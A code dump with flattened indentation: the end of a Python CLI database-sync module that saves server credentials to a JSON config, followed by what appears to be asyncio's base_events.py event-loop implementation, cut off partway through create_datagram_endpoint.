with open(utils.get_sync_file(), "w+") as f:
data = {
"server": server,
"username": username,
"password": password,
"path": path
}
json.dump(data, f, indent=2)
print(f"{Fore.GREEN}Configuration successfully saved!{Style.RESET_ALL}")
def show():
utils.clear_screen()
menu = Menu(utils.get_noice_text("Database sync"), colors=constants.colors)
menu.add_selectable(Option("Setup sync", setup_sync))
menu.add_selectable(Option("Upload current db", upload_current_db))
menu.add_selectable(Option("Download and replace current db", download_and_replace_current_db))
menu.run()
|
base_events.py
|
"""Base implementation of event loop.
The event loop can be broken up into a multiplexer (the part
responsible for notifying us of I/O events) and the event loop proper,
which wraps a multiplexer with functionality for scheduling callbacks,
immediately or at a given time in the future.
Whenever a public API takes a callback, subsequent positional
arguments will be passed to the callback if/when it is called. This
avoids the proliferation of trivial lambdas implementing closures.
Keyword arguments for the callback are not supported; this is a
conscious design decision, leaving the door open for keyword arguments
to modify the meaning of the API call itself.
"""
import collections
import collections.abc
import concurrent.futures
import functools
import heapq
import itertools
import os
import socket
import stat
import subprocess
import threading
import time
import traceback
import sys
import warnings
import weakref
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import constants
from . import coroutines
from . import events
from . import exceptions
from . import futures
from . import protocols
from . import sslproto
from . import staggered
from . import tasks
from . import transports
from . import trsock
from .log import logger
__all__ = 'BaseEventLoop',
# Minimum number of _scheduled timer handles before cleanup of
# cancelled handles is performed.
_MIN_SCHEDULED_TIMER_HANDLES = 100
# Minimum fraction of _scheduled timer handles that are cancelled
# before cleanup of cancelled handles is performed.
_MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5
_HAS_IPv6 = hasattr(socket, 'AF_INET6')
# Maximum timeout passed to select to avoid OS limitations
MAXIMUM_SELECT_TIMEOUT = 24 * 3600
# Used for deprecation and removal of `loop.create_datagram_endpoint()`'s
# *reuse_address* parameter
_unset = object()
def _format_handle(handle):
cb = handle._callback
if isinstance(getattr(cb, '__self__', None), tasks.Task):
# format the task
return repr(cb.__self__)
else:
return str(handle)
def _format_pipe(fd):
if fd == subprocess.PIPE:
return '<pipe>'
elif fd == subprocess.STDOUT:
return '<stdout>'
else:
return repr(fd)
def _set_reuseport(sock):
if not hasattr(socket, 'SO_REUSEPORT'):
raise ValueError('reuse_port not supported by socket module')
else:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except OSError:
raise ValueError('reuse_port not supported by socket module, '
'SO_REUSEPORT defined but not implemented.')
def _ipaddr_info(host, port, family, type, proto, flowinfo=0, scopeid=0):
# Try to skip getaddrinfo if "host" is already an IP. Users might have
# handled name resolution in their own code and pass in resolved IPs.
if not hasattr(socket, 'inet_pton'):
return
if proto not in {0, socket.IPPROTO_TCP, socket.IPPROTO_UDP} or \
host is None:
return None
if type == socket.SOCK_STREAM:
proto = socket.IPPROTO_TCP
elif type == socket.SOCK_DGRAM:
proto = socket.IPPROTO_UDP
else:
return None
if port is None:
port = 0
elif isinstance(port, bytes) and port == b'':
port = 0
elif isinstance(port, str) and port == '':
port = 0
else:
# If port's a service name like "http", don't skip getaddrinfo.
try:
port = int(port)
except (TypeError, ValueError):
return None
if family == socket.AF_UNSPEC:
afs = [socket.AF_INET]
if _HAS_IPv6:
afs.append(socket.AF_INET6)
else:
afs = [family]
if isinstance(host, bytes):
host = host.decode('idna')
if '%' in host:
# Linux's inet_pton doesn't accept an IPv6 zone index after host,
# like '::1%lo0'.
return None
for af in afs:
try:
socket.inet_pton(af, host)
# The host has already been resolved.
if _HAS_IPv6 and af == socket.AF_INET6:
return af, type, proto, '', (host, port, flowinfo, scopeid)
else:
return af, type, proto, '', (host, port)
except OSError:
pass
# "host" is not an IP address.
return None
def _interleave_addrinfos(addrinfos, first_address_family_count=1):
"""Interleave list of addrinfo tuples by family."""
# Group addresses by family
addrinfos_by_family = collections.OrderedDict()
for addr in addrinfos:
family = addr[0]
if family not in addrinfos_by_family:
addrinfos_by_family[family] = []
addrinfos_by_family[family].append(addr)
addrinfos_lists = list(addrinfos_by_family.values())
reordered = []
if first_address_family_count > 1:
reordered.extend(addrinfos_lists[0][:first_address_family_count - 1])
del addrinfos_lists[0][:first_address_family_count - 1]
reordered.extend(
a for a in itertools.chain.from_iterable(
itertools.zip_longest(*addrinfos_lists)
) if a is not None)
return reordered
def _run_until_complete_cb(fut):
if not fut.cancelled():
exc = fut.exception()
if isinstance(exc, (SystemExit, KeyboardInterrupt)):
# Issue #22429: run_forever() already finished, no need to
# stop it.
return
futures._get_loop(fut).stop()
if hasattr(socket, 'TCP_NODELAY'):
def _set_nodelay(sock):
if (sock.family in {socket.AF_INET, socket.AF_INET6} and
sock.type == socket.SOCK_STREAM and
sock.proto == socket.IPPROTO_TCP):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
else:
def _set_nodelay(sock):
pass
class _SendfileFallbackProtocol(protocols.Protocol):
def __init__(self, transp):
if not isinstance(transp, transports._FlowControlMixin):
raise TypeError("transport should be _FlowControlMixin instance")
self._transport = transp
self._proto = transp.get_protocol()
self._should_resume_reading = transp.is_reading()
self._should_resume_writing = transp._protocol_paused
transp.pause_reading()
transp.set_protocol(self)
if self._should_resume_writing:
self._write_ready_fut = self._transport._loop.create_future()
else:
self._write_ready_fut = None
async def drain(self):
if self._transport.is_closing():
raise ConnectionError("Connection closed by peer")
fut = self._write_ready_fut
if fut is None:
return
await fut
def connection_made(self, transport):
raise RuntimeError("Invalid state: "
"connection should have been established already.")
def connection_lost(self, exc):
if self._write_ready_fut is not None:
# Never happens if peer disconnects after sending the whole content
# Thus disconnection is always an exception from user perspective
if exc is None:
self._write_ready_fut.set_exception(
ConnectionError("Connection is closed by peer"))
else:
self._write_ready_fut.set_exception(exc)
self._proto.connection_lost(exc)
def pause_writing(self):
if self._write_ready_fut is not None:
return
self._write_ready_fut = self._transport._loop.create_future()
def resume_writing(self):
if self._write_ready_fut is None:
return
self._write_ready_fut.set_result(False)
self._write_ready_fut = None
def data_received(self, data):
raise RuntimeError("Invalid state: reading should be paused")
def eof_received(self):
raise RuntimeError("Invalid state: reading should be paused")
async def restore(self):
self._transport.set_protocol(self._proto)
if self._should_resume_reading:
self._transport.resume_reading()
if self._write_ready_fut is not None:
# Cancel the future.
# Basically it has no effect because protocol is switched back,
# no code should wait for it anymore.
self._write_ready_fut.cancel()
if self._should_resume_writing:
self._proto.resume_writing()
class Server(events.AbstractServer):
def __init__(self, loop, sockets, protocol_factory, ssl_context, backlog,
ssl_handshake_timeout):
self._loop = loop
self._sockets = sockets
self._active_count = 0
self._waiters = []
self._protocol_factory = protocol_factory
self._backlog = backlog
self._ssl_context = ssl_context
self._ssl_handshake_timeout = ssl_handshake_timeout
self._serving = False
self._serving_forever_fut = None
def __repr__(self):
return f'<{self.__class__.__name__} sockets={self.sockets!r}>'
def _attach(self):
assert self._sockets is not None
self._active_count += 1
def _detach(self):
assert self._active_count > 0
self._active_count -= 1
if self._active_count == 0 and self._sockets is None:
self._wakeup()
def _wakeup(self):
waiters = self._waiters
self._waiters = None
for waiter in waiters:
if not waiter.done():
waiter.set_result(waiter)
def _start_serving(self):
if self._serving:
return
self._serving = True
for sock in self._sockets:
sock.listen(self._backlog)
self._loop._start_serving(
self._protocol_factory, sock, self._ssl_context,
self, self._backlog, self._ssl_handshake_timeout)
def get_loop(self):
return self._loop
def is_serving(self):
return self._serving
@property
def sockets(self):
if self._sockets is None:
return ()
return tuple(trsock.TransportSocket(s) for s in self._sockets)
def close(self):
sockets = self._sockets
if sockets is None:
return
self._sockets = None
for sock in sockets:
self._loop._stop_serving(sock)
self._serving = False
if (self._serving_forever_fut is not None and
not self._serving_forever_fut.done()):
self._serving_forever_fut.cancel()
self._serving_forever_fut = None
if self._active_count == 0:
self._wakeup()
async def start_serving(self):
self._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0, loop=self._loop)
async def serve_forever(self):
if self._serving_forever_fut is not None:
raise RuntimeError(
f'server {self!r} is already being awaited on serve_forever()')
if self._sockets is None:
raise RuntimeError(f'server {self!r} is closed')
self._start_serving()
self._serving_forever_fut = self._loop.create_future()
try:
await self._serving_forever_fut
except exceptions.CancelledError:
try:
self.close()
await self.wait_closed()
finally:
raise
finally:
self._serving_forever_fut = None
async def wait_closed(self):
if self._sockets is None or self._waiters is None:
return
waiter = self._loop.create_future()
self._waiters.append(waiter)
await waiter
class BaseEventLoop(events.AbstractEventLoop):
def __init__(self):
self._timer_cancelled_count = 0
self._closed = False
self._stopping = False
self._ready = collections.deque()
self._scheduled = []
self._default_executor = None
self._internal_fds = 0
# Identifier of the thread running the event loop, or None if the
# event loop is not running
self._thread_id = None
self._clock_resolution = time.get_clock_info('monotonic').resolution
self._exception_handler = None
self.set_debug(coroutines._is_debug_mode())
# In debug mode, if the execution of a callback or a step of a task
# exceed this duration in seconds, the slow callback/task is logged.
self.slow_callback_duration = 0.1
self._current_handle = None
self._task_factory = None
self._coroutine_origin_tracking_enabled = False
self._coroutine_origin_tracking_saved_depth = None
# A weak set of all asynchronous generators that are
# being iterated by the loop.
self._asyncgens = weakref.WeakSet()
# Set to True when `loop.shutdown_asyncgens` is called.
self._asyncgens_shutdown_called = False
# Set to True when `loop.shutdown_default_executor` is called.
self._executor_shutdown_called = False
def __repr__(self):
return (
f'<{self.__class__.__name__} running={self.is_running()} '
f'closed={self.is_closed()} debug={self.get_debug()}>'
)
def create_future(self):
"""Create a Future object attached to the loop."""
return futures.Future(loop=self)
def create_task(self, coro, *, name=None):
"""Schedule a coroutine object.
Return a task object.
"""
self._check_closed()
if self._task_factory is None:
task = tasks.Task(coro, loop=self, name=name)
if task._source_traceback:
del task._source_traceback[-1]
else:
task = self._task_factory(self, coro)
tasks._set_task_name(task, name)
return task
def set_task_factory(self, factory):
"""Set a task factory that will be used by loop.create_task().
If factory is None the default task factory will be set.
If factory is a callable, it should have a signature matching
'(loop, coro)', where 'loop' will be a reference to the active
event loop, 'coro' will be a coroutine object. The callable
must return a Future.
"""
if factory is not None and not callable(factory):
raise TypeError('task factory must be a callable or None')
self._task_factory = factory
def get_task_factory(self):
"""Return a task factory, or None if the default one is in use."""
return self._task_factory
def _make_socket_transport(self, sock, protocol, waiter=None, *,
extra=None, server=None):
"""Create socket transport."""
raise NotImplementedError
def _make_ssl_transport(
self, rawsock, protocol, sslcontext, waiter=None,
*, server_side=False, server_hostname=None,
extra=None, server=None,
ssl_handshake_timeout=None,
call_connection_made=True):
"""Create SSL transport."""
raise NotImplementedError
def _make_datagram_transport(self, sock, protocol,
address=None, waiter=None, extra=None):
"""Create datagram transport."""
raise NotImplementedError
def _make_read_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create read pipe transport."""
raise NotImplementedError
def _make_write_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create write pipe transport."""
raise NotImplementedError
async def _make_subprocess_transport(self, protocol, args, shell,
stdin, stdout, stderr, bufsize,
extra=None, **kwargs):
"""Create subprocess transport."""
raise NotImplementedError
def _write_to_self(self):
"""Write a byte to self-pipe, to wake up the event loop.
This may be called from a different thread.
The subclass is responsible for implementing the self-pipe.
"""
raise NotImplementedError
def _process_events(self, event_list):
"""Process selector events."""
raise NotImplementedError
def _check_closed(self):
if self._closed:
raise RuntimeError('Event loop is closed')
def _check_default_executor(self):
if self._executor_shutdown_called:
raise RuntimeError('Executor shutdown has been called')
def _asyncgen_finalizer_hook(self, agen):
self._asyncgens.discard(agen)
if not self.is_closed():
self.call_soon_threadsafe(self.create_task, agen.aclose())
def _asyncgen_firstiter_hook(self, agen):
if self._asyncgens_shutdown_called:
warnings.warn(
f"asynchronous generator {agen!r} was scheduled after "
f"loop.shutdown_asyncgens() call",
ResourceWarning, source=self)
self._asyncgens.add(agen)
async def shutdown_asyncgens(self):
"""Shutdown all active asynchronous generators."""
self._asyncgens_shutdown_called = True
if not len(self._asyncgens):
# If Python version is <3.6 or we don't have any asynchronous
# generators alive.
return
closing_agens = list(self._asyncgens)
self._asyncgens.clear()
results = await tasks.gather(
*[ag.aclose() for ag in closing_agens],
return_exceptions=True,
loop=self)
for result, agen in zip(results, closing_agens):
if isinstance(result, Exception):
self.call_exception_handler({
'message': f'an error occurred during closing of '
f'asynchronous generator {agen!r}',
'exception': result,
'asyncgen': agen
})
async def shutdown_default_executor(self):
"""Schedule the shutdown of the default executor."""
self._executor_shutdown_called = True
if self._default_executor is None:
return
future = self.create_future()
thread = threading.Thread(target=self._do_shutdown, args=(future,))
thread.start()
try:
await future
finally:
thread.join()
def _do_shutdown(self, future):
try:
self._default_executor.shutdown(wait=True)
self.call_soon_threadsafe(future.set_result, None)
except Exception as ex:
self.call_soon_threadsafe(future.set_exception, ex)
def _check_runnung(self):
if self.is_running():
raise RuntimeError('This event loop is already running')
if events._get_running_loop() is not None:
raise RuntimeError(
'Cannot run the event loop while another loop is running')
def run_forever(self):
"""Run until stop() is called."""
self._check_closed()
self._check_runnung()
self._set_coroutine_origin_tracking(self._debug)
self._thread_id = threading.get_ident()
old_agen_hooks = sys.get_asyncgen_hooks()
sys.set_asyncgen_hooks(firstiter=self._asyncgen_firstiter_hook,
finalizer=self._asyncgen_finalizer_hook)
try:
events._set_running_loop(self)
while True:
self._run_once()
if self._stopping:
break
finally:
self._stopping = False
self._thread_id = None
events._set_running_loop(None)
self._set_coroutine_origin_tracking(False)
sys.set_asyncgen_hooks(*old_agen_hooks)
def run_until_complete(self, future):
"""Run until the Future is done.
If the argument is a coroutine, it is wrapped in a Task.
WARNING: It would be disastrous to call run_until_complete()
with the same coroutine twice -- it would wrap it in two
different Tasks and that can't be good.
Return the Future's result, or raise its exception.
"""
self._check_closed()
self._check_runnung()
new_task = not futures.isfuture(future)
future = tasks.ensure_future(future, loop=self)
if new_task:
# An exception is raised if the future didn't complete, so there
# is no need to log the "destroy pending task" message
future._log_destroy_pending = False
future.add_done_callback(_run_until_complete_cb)
try:
self.run_forever()
except:
if new_task and future.done() and not future.cancelled():
# The coroutine raised a BaseException. Consume the exception
# to not log a warning, the caller doesn't have access to the
# local task.
future.exception()
raise
finally:
future.remove_done_callback(_run_until_complete_cb)
if not future.done():
raise RuntimeError('Event loop stopped before Future completed.')
return future.result()
def stop(self):
"""Stop running the event loop.
Every callback already scheduled will still run. This simply informs
run_forever to stop looping after a complete iteration.
"""
self._stopping = True
def close(self):
"""Close the event loop.
This clears the queues and shuts down the executor,
but does not wait for the executor to finish.
The event loop must not be running.
"""
if self.is_running():
raise RuntimeError("Cannot close a running event loop")
if self._closed:
return
if self._debug:
logger.debug("Close %r", self)
self._closed = True
self._ready.clear()
self._scheduled.clear()
self._executor_shutdown_called = True
executor = self._default_executor
if executor is not None:
self._default_executor = None
executor.shutdown(wait=False)
def is_closed(self):
"""Returns True if the event loop was closed."""
return self._closed
def __del__(self, _warn=warnings.warn):
if not self.is_closed():
_warn(f"unclosed event loop {self!r}", ResourceWarning, source=self)
if not self.is_running():
self.close()
def is_running(self):
"""Returns True if the event loop is running."""
return (self._thread_id is not None)
def time(self):
"""Return the time according to the event loop's clock.
This is a float expressed in seconds since an epoch, but the
epoch, precision, accuracy and drift are unspecified and may
differ per event loop.
"""
return time.monotonic()
def call_later(self, delay, callback, *args, context=None):
"""Arrange for a callback to be called at a given time.
Return a Handle: an opaque object with a cancel() method that
can be used to cancel the call.
The delay can be an int or float, expressed in seconds. It is
always relative to the current time.
Each callback will be called exactly once. If two callbacks
are scheduled for exactly the same time, it undefined which
will be called first.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
timer = self.call_at(self.time() + delay, callback, *args,
context=context)
if timer._source_traceback:
del timer._source_traceback[-1]
return timer
def call_at(self, when, callback, *args, context=None):
"""Like call_later(), but uses an absolute time.
Absolute time corresponds to the event loop's time() method.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_at')
timer = events.TimerHandle(when, callback, args, self, context)
if timer._source_traceback:
del timer._source_traceback[-1]
heapq.heappush(self._scheduled, timer)
timer._scheduled = True
return timer
def call_soon(self, callback, *args, context=None):
"""Arrange for a callback to be called as soon as possible.
This operates as a FIFO queue: callbacks are called in the
order in which they are registered. Each callback will be
called exactly once.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_soon')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
return handle
def _check_callback(self, callback, method):
if (coroutines.iscoroutine(callback) or
coroutines.iscoroutinefunction(callback)):
raise TypeError(
f"coroutines cannot be used with {method}()")
if not callable(callback):
raise TypeError(
f'a callable object was expected by {method}(), '
f'got {callback!r}')
def _call_soon(self, callback, args, context):
handle = events.Handle(callback, args, self, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._ready.append(handle)
return handle
def _check_thread(self):
"""Check that the current thread is the thread running the event loop.
Non-thread-safe methods of this class make this assumption and will
likely behave incorrectly when the assumption is violated.
Should only be called when (self._debug == True). The caller is
responsible for checking this condition for performance reasons.
"""
if self._thread_id is None:
return
thread_id = threading.get_ident()
if thread_id != self._thread_id:
raise RuntimeError(
"Non-thread-safe operation invoked on an event loop other "
"than the current one")
def call_soon_threadsafe(self, callback, *args, context=None):
"""Like call_soon(), but thread-safe."""
self._check_closed()
if self._debug:
self._check_callback(callback, 'call_soon_threadsafe')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._write_to_self()
return handle
def run_in_executor(self, executor, func, *args):
self._check_closed()
if self._debug:
self._check_callback(func, 'run_in_executor')
if executor is None:
executor = self._default_executor
# Only check when the default executor is being used
self._check_default_executor()
if executor is None:
executor = concurrent.futures.ThreadPoolExecutor()
self._default_executor = executor
return futures.wrap_future(
executor.submit(func, *args), loop=self)
def set_default_executor(self, executor):
if not isinstance(executor, concurrent.futures.ThreadPoolExecutor):
warnings.warn(
'Using the default executor that is not an instance of '
'ThreadPoolExecutor is deprecated and will be prohibited '
'in Python 3.9',
DeprecationWarning, 2)
self._default_executor = executor
def _getaddrinfo_debug(self, host, port, family, type, proto, flags):
msg = [f"{host}:{port!r}"]
if family:
msg.append(f'family={family!r}')
if type:
msg.append(f'type={type!r}')
if proto:
msg.append(f'proto={proto!r}')
if flags:
msg.append(f'flags={flags!r}')
msg = ', '.join(msg)
logger.debug('Get address info %s', msg)
t0 = self.time()
addrinfo = socket.getaddrinfo(host, port, family, type, proto, flags)
dt = self.time() - t0
msg = f'Getting address info {msg} took {dt * 1e3:.3f}ms: {addrinfo!r}'
if dt >= self.slow_callback_duration:
logger.info(msg)
else:
logger.debug(msg)
return addrinfo
async def getaddrinfo(self, host, port, *,
family=0, type=0, proto=0, flags=0):
if self._debug:
getaddr_func = self._getaddrinfo_debug
else:
getaddr_func = socket.getaddrinfo
return await self.run_in_executor(
None, getaddr_func, host, port, family, type, proto, flags)
async def getnameinfo(self, sockaddr, flags=0):
return await self.run_in_executor(
None, socket.getnameinfo, sockaddr, flags)
async def sock_sendfile(self, sock, file, offset=0, count=None,
*, fallback=True):
if self._debug and sock.gettimeout() != 0:
raise ValueError("the socket must be non-blocking")
self._check_sendfile_params(sock, file, offset, count)
try:
return await self._sock_sendfile_native(sock, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
return await self._sock_sendfile_fallback(sock, file,
offset, count)
async def _sock_sendfile_native(self, sock, file, offset, count):
# NB: sendfile syscall is not supported for SSL sockets and
# non-mmap files even if sendfile is supported by OS
raise exceptions.SendfileNotAvailableError(
f"syscall sendfile is not available for socket {sock!r} "
"and file {file!r} combination")
async def _sock_sendfile_fallback(self, sock, file, offset, count):
if offset:
file.seek(offset)
blocksize = (
min(count, constants.SENDFILE_FALLBACK_READBUFFER_SIZE)
if count else constants.SENDFILE_FALLBACK_READBUFFER_SIZE
)
buf = bytearray(blocksize)
total_sent = 0
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
break
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
break # EOF
await self.sock_sendall(sock, view[:read])
total_sent += read
return total_sent
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
def _check_sendfile_params(self, sock, file, offset, count):
if 'b' not in getattr(file, 'mode', 'b'):
raise ValueError("file should be opened in binary mode")
if not sock.type == socket.SOCK_STREAM:
raise ValueError("only SOCK_STREAM type sockets are supported")
if count is not None:
if not isinstance(count, int):
raise TypeError(
"count must be a positive integer (got {!r})".format(count))
if count <= 0:
raise ValueError(
"count must be a positive integer (got {!r})".format(count))
if not isinstance(offset, int):
raise TypeError(
"offset must be a non-negative integer (got {!r})".format(
offset))
if offset < 0:
raise ValueError(
"offset must be a non-negative integer (got {!r})".format(
offset))
async def _connect_sock(self, exceptions, addr_info, local_addr_infos=None):
"""Create, bind and connect one socket."""
my_exceptions = []
exceptions.append(my_exceptions)
family, type_, proto, _, address = addr_info
sock = None
try:
sock = socket.socket(family=family, type=type_, proto=proto)
sock.setblocking(False)
if local_addr_infos is not None:
for _, _, _, _, laddr in local_addr_infos:
try:
sock.bind(laddr)
break
except OSError as exc:
msg = (
f'error while attempting to bind on '
f'address {laddr!r}: '
f'{exc.strerror.lower()}'
)
exc = OSError(exc.errno, msg)
my_exceptions.append(exc)
else: # all bind attempts failed
raise my_exceptions.pop()
await self.sock_connect(sock, address)
return sock
except OSError as exc:
my_exceptions.append(exc)
if sock is not None:
sock.close()
raise
except:
if sock is not None:
sock.close()
raise
async def create_connection(
self, protocol_factory, host=None, port=None,
*, ssl=None, family=0,
proto=0, flags=0, sock=None,
local_addr=None, server_hostname=None,
ssl_handshake_timeout=None,
happy_eyeballs_delay=None, interleave=None):
"""Connect to a TCP server.
Create a streaming transport connection to a given Internet host and
port: socket family AF_INET or socket.AF_INET6 depending on host (or
family if specified), socket type SOCK_STREAM. protocol_factory must be
a callable returning a protocol instance.
This method is a coroutine which will try to establish the connection
in the background. When successful, the coroutine returns a
(transport, protocol) pair.
"""
if server_hostname is not None and not ssl:
raise ValueError('server_hostname is only meaningful with ssl')
if server_hostname is None and ssl:
# Use host as default for server_hostname. It is an error
# if host is empty or not set, e.g. when an
# already-connected socket was passed or when only a port
# is given. To avoid this error, you can pass
# server_hostname='' -- this will bypass the hostname
# check. (This also means that if host is a numeric
# IP/IPv6 address, we will attempt to verify that exact
# address; this will probably fail, but it is possible to
# create a certificate for a specific IP address, so we
# don't judge it here.)
if not host:
raise ValueError('You must set server_hostname '
'when using ssl without a host')
server_hostname = host
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if happy_eyeballs_delay is not None and interleave is None:
# If using happy eyeballs, default to interleave addresses by family
interleave = 1
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
infos = await self._ensure_resolved(
(host, port), family=family,
type=socket.SOCK_STREAM, proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
if local_addr is not None:
laddr_infos = await self._ensure_resolved(
local_addr, family=family,
type=socket.SOCK_STREAM, proto=proto,
flags=flags, loop=self)
if not laddr_infos:
raise OSError('getaddrinfo() returned empty list')
else:
laddr_infos = None
if interleave:
infos = _interleave_addrinfos(infos, interleave)
exceptions = []
if happy_eyeballs_delay is None:
# not using happy eyeballs
for addrinfo in infos:
try:
sock = await self._connect_sock(
exceptions, addrinfo, laddr_infos)
break
except OSError:
continue
else: # using happy eyeballs
sock, _, _ = await staggered.staggered_race(
(functools.partial(self._connect_sock,
exceptions, addrinfo, laddr_infos)
for addrinfo in infos),
happy_eyeballs_delay, loop=self)
if sock is None:
exceptions = [exc for sub in exceptions for exc in sub]
if len(exceptions) == 1:
raise exceptions[0]
else:
# If they all have the same str(), raise one.
model = str(exceptions[0])
if all(str(exc) == model for exc in exceptions):
raise exceptions[0]
# Raise a combined exception so the user can see all
# the various error messages.
raise OSError('Multiple exceptions: {}'.format(
', '.join(str(exc) for exc in exceptions)))
else:
if sock is None:
raise ValueError(
'host and port was not specified and no sock specified')
if sock.type != socket.SOCK_STREAM:
# We allow AF_INET, AF_INET6, AF_UNIX as long as they
# are SOCK_STREAM.
# We support passing AF_UNIX sockets even though we have
# a dedicated API for that: create_unix_connection.
# Disallowing AF_UNIX in this method, breaks backwards
# compatibility.
raise ValueError(
f'A Stream Socket was expected, got {sock!r}')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r connected to %s:%r: (%r, %r)",
sock, host, port, transport, protocol)
return transport, protocol
async def _create_connection_transport(
self, sock, protocol_factory, ssl,
server_hostname, server_side=False,
ssl_handshake_timeout=None):
sock.setblocking(False)
protocol = protocol_factory()
waiter = self.create_future()
if ssl:
sslcontext = None if isinstance(ssl, bool) else ssl
transport = self._make_ssl_transport(
sock, protocol, sslcontext, waiter,
server_side=server_side, server_hostname=server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
else:
transport = self._make_socket_transport(sock, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def sendfile(self, transport, file, offset=0, count=None,
*, fallback=True):
"""Send a file to transport.
Return the total number of bytes which were sent.
The method uses high-performance os.sendfile if available.
file must be a regular file object opened in binary mode.
offset tells from where to start reading the file. If specified,
count is the total number of bytes to transmit as opposed to
sending the file until EOF is reached. File position is updated on
return or also in case of error in which case file.tell()
can be used to figure out the number of bytes
which were sent.
fallback set to True makes asyncio to manually read and send
the file when the platform does not support the sendfile syscall
(e.g. Windows or SSL socket on Unix).
Raise SendfileNotAvailableError if the system does not support
sendfile syscall and fallback is False.
"""
if transport.is_closing():
raise RuntimeError("Transport is closing")
mode = getattr(transport, '_sendfile_compatible',
constants._SendfileMode.UNSUPPORTED)
if mode is constants._SendfileMode.UNSUPPORTED:
raise RuntimeError(
f"sendfile is not supported for transport {transport!r}")
if mode is constants._SendfileMode.TRY_NATIVE:
try:
return await self._sendfile_native(transport, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
if not fallback:
raise RuntimeError(
f"fallback is disabled and native sendfile is not "
f"supported for transport {transport!r}")
return await self._sendfile_fallback(transport, file,
offset, count)
async def _sendfile_native(self, transp, file, offset, count):
raise exceptions.SendfileNotAvailableError(
"sendfile syscall is not supported")
async def _sendfile_fallback(self, transp, file, offset, count):
if offset:
file.seek(offset)
blocksize = min(count, 16384) if count else 16384
buf = bytearray(blocksize)
total_sent = 0
proto = _SendfileFallbackProtocol(transp)
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
return total_sent
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
return total_sent # EOF
await proto.drain()
transp.write(view[:read])
total_sent += read
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
await proto.restore()
async def start_tls(self, transport, protocol, sslcontext, *,
server_side=False,
server_hostname=None,
ssl_handshake_timeout=None):
"""Upgrade transport to TLS.
Return a new transport that *protocol* should start using
immediately.
"""
if ssl is None:
raise RuntimeError('Python ssl module is not available')
if not isinstance(sslcontext, ssl.SSLContext):
raise TypeError(
f'sslcontext is expected to be an instance of ssl.SSLContext, '
f'got {sslcontext!r}')
if not getattr(transport, '_start_tls_compatible', False):
raise TypeError(
f'transport {transport!r} is not supported by start_tls()')
waiter = self.create_future()
ssl_protocol = sslproto.SSLProtocol(
self, protocol, sslcontext, waiter,
server_side, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout,
call_connection_made=False)
# Pause early so that "ssl_protocol.data_received()" doesn't
# have a chance to get called before "ssl_protocol.connection_made()".
transport.pause_reading()
transport.set_protocol(ssl_protocol)
conmade_cb = self.call_soon(ssl_protocol.connection_made, transport)
resume_cb = self.call_soon(transport.resume_reading)
try:
await waiter
except BaseException:
transport.close()
conmade_cb.cancel()
resume_cb.cancel()
raise
return ssl_protocol._app_transport
async def create_datagram_endpoint(self, protocol_factory,
local_addr=None, remote_addr=None, *,
family=0, proto=0, flags=0,
reuse_address=_unset, reuse_port=None,
allow_broadcast=None, sock=None):
"""Create datagram connection."""
if sock is not None:
if sock.type != socket.SOCK_DGRAM:
raise ValueError(
f'A UDP Socket was expected, got {sock!r}')
if (local_addr or remote_addr or
family or proto or flags or
reuse_port or allow_broadcast):
# show the problematic kwargs in exception msg
opts = dict(local_addr=local_addr, remote_addr=remote_addr,
family=family, proto=proto, flags=flags,
reuse_address=reuse_address, reuse_port=reuse_port,
allow_broadcast=allow_broadcast)
problems = ', '.join(f'{k}={v}' for k, v in opts.items() if v)
raise ValueError(
f'socket modifier keyword arguments can not be used '
f'when sock is specified. ({problems})')
sock.setblocking(False)
r_addr = None
else:
if not (local_addr or remote_addr):
if family == 0:
raise ValueError('unexpected address family')
addr_pairs_info = (((family, proto), (None, None)),)
elif hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
for addr in (local_addr, remote_addr):
if addr is not None and not isinstance(addr, str):
raise TypeError('string is expected')
if local_addr and local_addr[0] not in (0, '\x00'):
try:
if stat.S_ISSOCK(os.stat(local_addr).st_mode):
os.remove(local_addr)
except FileNotFoundError:
pass
except OSError as err:
# Directory may have permissions only to create socket.
logger.error('Unable to check or remove stale UNIX '
'socket %r: %r',
local_addr, err)
addr_pairs_info = (((family, proto),
(local_addr, remote_addr)), )
else:
# join address by (family, protocol)
addr_infos = {} # Using order preserving dict
